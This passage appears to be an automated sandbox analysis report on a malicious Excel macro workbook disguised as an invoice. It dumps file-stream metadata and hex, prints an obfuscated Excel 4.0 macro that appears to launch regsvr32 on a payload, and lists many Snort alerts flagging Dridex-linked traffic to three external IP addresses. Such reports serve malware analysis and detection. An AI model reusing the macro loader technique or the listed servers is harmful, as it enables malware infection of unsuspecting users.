                                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . .
                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00
                                                                  Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363
                                                                  General
                                                                  Stream Path:VBA/__SRP_2
                                                                  File Type:data
                                                                  Stream Size:363
                                                                  Entropy:2.21122978445
                                                                  Base64 Encoded:False
                                                                  Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                  Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398
                                                                  General
                                                                  Stream Path:VBA/__SRP_3
                                                                  File Type:data
                                                                  Stream Size:398
                                                                  Entropy:2.07709195049
                                                                  Base64 Encoded:False
                                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . .
                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                  Stream Path: VBA/dir, File Type: data, Stream Size: 820
                                                                  General
                                                                  Stream Path:VBA/dir
                                                                  File Type:data
                                                                  Stream Size:820
                                                                  Entropy:6.49145935167
                                                                  Base64 Encoded:True
                                                                  Data ASCII:. 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                  Data Raw:01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 09 a2 eb 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                  Macro 4.0 Code

                                                                  CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
                                                                  
                                                                  "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                                                                  OLE File "/opt/package/joesandbox/database/analysis/338095/sample/INV9698791470-20210111920647.xlsm"

                                                                  Indicators

                                                                  Has Summary Info:False
                                                                  Application Name:unknown
                                                                  Encrypted Document:False
                                                                  Contains Word Document Stream:
                                                                  Contains Workbook/Book Stream:
                                                                  Contains PowerPoint Document Stream:
                                                                  Contains Visio Document Stream:
                                                                  Contains ObjectPool Stream:
                                                                  Flash Objects Count:
                                                                  Contains VBA Macros:False

                                                                  Summary

                                                                  Author:
                                                                  Last Saved By:
                                                                  Create Time:2020-12-07T14:38:21Z
                                                                  Last Saved Time:2021-01-11T14:32:26Z
                                                                  Creating Application:Microsoft Excel
                                                                  Security:0

                                                                  Document Summary

                                                                  Thumbnail Scaling Desired:false
                                                                  Company:
                                                                  Contains Dirty Links:false
                                                                  Shared Document:false
                                                                  Changed Hyperlinks:false
                                                                  Application Version:16.0300

                                                                  Streams

                                                                  Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                                                                  General
                                                                  Stream Path:\x1CompObj
                                                                  File Type:data
                                                                  Stream Size:115
                                                                  Entropy:4.80096587863
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Stream Path: f, File Type: data, Stream Size: 178
                                                                  General
                                                                  Stream Path:f
                                                                  File Type:data
                                                                  Stream Size:178
                                                                  Entropy:2.56223021678
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
                                                                  Data Raw:00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 00 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110
                                                                  General
                                                                  Stream Path:i02/\x1CompObj
                                                                  File Type:data
                                                                  Stream Size:110
                                                                  Entropy:4.63372611993
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Stream Path: i02/f, File Type: data, Stream Size: 40
                                                                  General
                                                                  Stream Path:i02/f
                                                                  File Type:data
                                                                  Stream Size:40
                                                                  Entropy:1.54176014818
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Stream Path: i02/o, File Type: empty, Stream Size: 0
                                                                  General
                                                                  Stream Path:i02/o
                                                                  File Type:empty
                                                                  Stream Size:0
                                                                  Entropy:0.0
                                                                  Base64 Encoded:False
                                                                  Data ASCII:
                                                                  Data Raw:
                                                                  Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110
                                                                  General
                                                                  Stream Path:i03/\x1CompObj
                                                                  File Type:data
                                                                  Stream Size:110
                                                                  Entropy:4.63372611993
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Stream Path: i03/f, File Type: data, Stream Size: 40
                                                                  General
                                                                  Stream Path:i03/f
                                                                  File Type:data
                                                                  Stream Size:40
                                                                  Entropy:1.90677964945
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Stream Path: i03/o, File Type: empty, Stream Size: 0
                                                                  General
                                                                  Stream Path:i03/o
                                                                  File Type:empty
                                                                  Stream Size:0
                                                                  Entropy:0.0
                                                                  Base64 Encoded:False
                                                                  Data ASCII:
                                                                  Data Raw:
                                                                  Stream Path: o, File Type: data, Stream Size: 152
                                                                  General
                                                                  Stream Path:o
                                                                  File Type:data
                                                                  Stream Size:152
                                                                  Entropy:2.68720470607
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
                                                                  Data Raw:00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80
                                                                  Stream Path: x, File Type: data, Stream Size: 48
                                                                  General
                                                                  Stream Path:x
                                                                  File Type:data
                                                                  Stream Size:48
                                                                  Entropy:1.42267983198
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

                                                                  Macro 4.0 Code

                                                                  CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
                                                                  
                                                                  "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  01/11/21-16:52:15.334491TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434916877.220.64.37192.168.2.22
                                                                  01/11/21-16:52:17.859938TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084917080.86.91.27192.168.2.22
                                                                  01/11/21-16:52:18.808894TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491715.100.228.233192.168.2.22
                                                                  01/11/21-16:52:18.808894TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491715.100.228.233192.168.2.22
                                                                  01/11/21-16:52:20.144718TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917377.220.64.37192.168.2.22
                                                                  01/11/21-16:52:20.675955TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084917480.86.91.27192.168.2.22
                                                                  01/11/21-16:52:21.214869TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491755.100.228.233192.168.2.22
                                                                  01/11/21-16:52:21.214869TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491755.100.228.233192.168.2.22
                                                                  01/11/21-16:52:22.272887TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917777.220.64.37192.168.2.22
                                                                  01/11/21-16:52:22.794837TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084917880.86.91.27192.168.2.22
                                                                  01/11/21-16:52:23.323486TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491795.100.228.233192.168.2.22
                                                                  01/11/21-16:52:23.323486TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491795.100.228.233192.168.2.22
                                                                  01/11/21-16:52:24.377834TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434918177.220.64.37192.168.2.22
                                                                  01/11/21-16:52:24.901149TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918280.86.91.27192.168.2.22
                                                                  01/11/21-16:52:25.418198TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491835.100.228.233192.168.2.22
                                                                  01/11/21-16:52:25.418198TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491835.100.228.233192.168.2.22
                                                                  01/11/21-16:52:26.483845TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434918577.220.64.37192.168.2.22
                                                                  01/11/21-16:52:27.011541TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918680.86.91.27192.168.2.22
                                                                  01/11/21-16:52:27.531506TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491875.100.228.233192.168.2.22
                                                                  01/11/21-16:52:27.531506TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491875.100.228.233192.168.2.22
                                                                  01/11/21-16:52:28.591475TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434918977.220.64.37192.168.2.22
                                                                  01/11/21-16:52:29.110597TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084919080.86.91.27192.168.2.22
                                                                  01/11/21-16:52:29.628147TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491915.100.228.233192.168.2.22
                                                                  01/11/21-16:52:29.628147TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491915.100.228.233192.168.2.22
                                                                  01/11/21-16:52:30.659602TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919377.220.64.37192.168.2.22
                                                                  01/11/21-16:52:31.192506TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084919480.86.91.27192.168.2.22
                                                                  01/11/21-16:52:31.707272TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491955.100.228.233192.168.2.22
                                                                  01/11/21-16:52:31.707272TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491955.100.228.233192.168.2.22
                                                                  01/11/21-16:52:32.743416TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919777.220.64.37192.168.2.22
                                                                  01/11/21-16:52:33.263684TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084919880.86.91.27192.168.2.22
                                                                  01/11/21-16:52:33.795014TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491995.100.228.233192.168.2.22
                                                                  01/11/21-16:52:33.795014TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491995.100.228.233192.168.2.22
                                                                  01/11/21-16:52:34.824404TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434920177.220.64.37192.168.2.22
                                                                  01/11/21-16:52:35.475034TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920280.86.91.27192.168.2.22
                                                                  01/11/21-16:52:36.272130TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492035.100.228.233192.168.2.22
                                                                  01/11/21-16:52:36.272130TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492035.100.228.233192.168.2.22
                                                                  01/11/21-16:52:38.580311TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434920577.220.64.37192.168.2.22
                                                                  01/11/21-16:52:39.358046TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920680.86.91.27192.168.2.22
                                                                  01/11/21-16:52:39.901624TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492075.100.228.233192.168.2.22
                                                                  01/11/21-16:52:39.901624TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492075.100.228.233192.168.2.22
                                                                  01/11/21-16:52:40.914675TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434920977.220.64.37192.168.2.22
                                                                  01/11/21-16:52:41.429806TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921080.86.91.27192.168.2.22
                                                                  01/11/21-16:52:41.945066TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492115.100.228.233192.168.2.22
                                                                  01/11/21-16:52:41.945066TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492115.100.228.233192.168.2.22
                                                                  01/11/21-16:52:42.972027TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921377.220.64.37192.168.2.22
                                                                  01/11/21-16:52:43.484764TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921480.86.91.27192.168.2.22
                                                                  01/11/21-16:52:43.994555TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492155.100.228.233192.168.2.22
                                                                  01/11/21-16:52:43.994555TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492155.100.228.233192.168.2.22
                                                                  01/11/21-16:52:45.013259TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921777.220.64.37192.168.2.22
                                                                  01/11/21-16:52:45.528690TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921880.86.91.27192.168.2.22
                                                                  01/11/21-16:52:46.062422TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492195.100.228.233192.168.2.22
                                                                  01/11/21-16:52:46.062422TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492195.100.228.233192.168.2.22
                                                                  01/11/21-16:52:47.122773TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922177.220.64.37192.168.2.22
                                                                  01/11/21-16:52:47.627454TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922280.86.91.27192.168.2.22
                                                                  01/11/21-16:52:48.129225TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492235.100.228.233192.168.2.22
                                                                  01/11/21-16:52:48.129225TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492235.100.228.233192.168.2.22
                                                                  01/11/21-16:52:49.165604TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922677.220.64.37192.168.2.22
                                                                  01/11/21-16:52:49.670559TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922880.86.91.27192.168.2.22
                                                                  01/11/21-16:52:50.246739TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492295.100.228.233192.168.2.22
                                                                  01/11/21-16:52:50.246739TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492295.100.228.233192.168.2.22
                                                                  01/11/21-16:52:51.330600TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923177.220.64.37192.168.2.22
                                                                  01/11/21-16:52:51.851557TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923280.86.91.27192.168.2.22
                                                                  01/11/21-16:52:52.353121TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492335.100.228.233192.168.2.22
                                                                  01/11/21-16:52:52.353121TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492335.100.228.233192.168.2.22
                                                                  01/11/21-16:52:53.496805TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923577.220.64.37192.168.2.22
                                                                  01/11/21-16:52:54.115599TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923680.86.91.27192.168.2.22
                                                                  01/11/21-16:52:54.990514TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492375.100.228.233192.168.2.22
                                                                  01/11/21-16:52:54.990514TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492375.100.228.233192.168.2.22
                                                                  01/11/21-16:52:56.130653TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923977.220.64.37192.168.2.22
                                                                  01/11/21-16:52:56.659494TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924080.86.91.27192.168.2.22
                                                                  01/11/21-16:52:57.182169TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492415.100.228.233192.168.2.22
                                                                  01/11/21-16:52:57.182169TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492415.100.228.233192.168.2.22
                                                                  01/11/21-16:52:58.192353TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924377.220.64.37192.168.2.22
                                                                  01/11/21-16:52:58.701529TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924480.86.91.27192.168.2.22
                                                                  01/11/21-16:52:59.229429TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492455.100.228.233192.168.2.22
                                                                  01/11/21-16:52:59.229429TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492455.100.228.233192.168.2.22
                                                                  01/11/21-16:53:00.251308TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924777.220.64.37192.168.2.22
                                                                  01/11/21-16:53:00.759616TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924880.86.91.27192.168.2.22
                                                                  01/11/21-16:53:01.274327TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492495.100.228.233192.168.2.22
                                                                  01/11/21-16:53:01.274327TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492495.100.228.233192.168.2.22
                                                                  01/11/21-16:53:02.306617TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925177.220.64.37192.168.2.22
                                                                  01/11/21-16:53:02.818243TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925280.86.91.27192.168.2.22
                                                                  01/11/21-16:53:03.360060TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492535.100.228.233192.168.2.22
                                                                  01/11/21-16:53:03.360060TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492535.100.228.233192.168.2.22
                                                                  01/11/21-16:53:04.397885TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925577.220.64.37192.168.2.22
                                                                  01/11/21-16:53:04.893611TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925680.86.91.27192.168.2.22
                                                                  01/11/21-16:53:05.419481TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492575.100.228.233192.168.2.22
                                                                  01/11/21-16:53:05.419481TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492575.100.228.233192.168.2.22
                                                                  01/11/21-16:53:06.462219TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925977.220.64.37192.168.2.22
                                                                  01/11/21-16:53:06.979873TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926080.86.91.27192.168.2.22
                                                                  01/11/21-16:53:07.492309TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492615.100.228.233192.168.2.22
                                                                  01/11/21-16:53:07.492309TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492615.100.228.233192.168.2.22
